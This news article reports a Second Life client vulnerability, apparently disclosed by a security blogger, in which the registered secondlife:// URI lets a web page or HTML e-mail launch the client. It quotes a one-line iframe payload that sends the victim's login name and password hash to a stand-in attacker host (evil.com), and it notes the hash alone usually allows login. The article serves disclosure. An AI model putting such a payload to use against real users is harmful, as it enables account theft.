Security hole in Second Life client

Security blogger Petko Petkov has reported a vulnerability in the Second Life online gaming client. Attackers can apparently exploit it to obtain user login credentials for the gaming site. When installed, the client registers the URI secondlife://. This URI can then be used to transfer other parameters when the client is launched. When the following line is embedded in a website, attackers can get the client to send login credentials in an XML form without being prompted:

<iframe src='secondlife://" -autologin
 -loginuri "http://evil.com/sl/record-login.php'></iframe>

An XML document transmitted by the Second Life client contains a login name and user password, both of which are sent as an MD5 hash. The credentials can be recovered by an attacker, for example by using Rainbow tables which are readily available online. But Petkov points out that this process is usually unnecessary. The hash alone generally suffices to login at Second Life. He says that the password is only needed to use other Second Life services. Victims need only visit to a specially crafted website or open an HTML e-mail for the attack to succeed. There is no solution for this vulnerability; un-registering the URI should help, though, as a workaround, and gamers should of course ensure their Second Life login is completely different from their computer account credentials.

It remains to be seen what real use criminals can make of this login data. Probably the most lucrative option would be to clean out a victim's virtual Linden dollar account. Currently, 1,000 Linden dollars are worth 3.5 real-world US dollars. On the other hand, it will probably be difficult to withdraw large amounts because there is a cap on exchanges depending on how long a user has been playing. At any rate, few players are said to have more than 250,000 Linden dollars, which only amounts to around UK£430.

See also:

• IE pwns SecondLife, security advisory at pdp

(mba)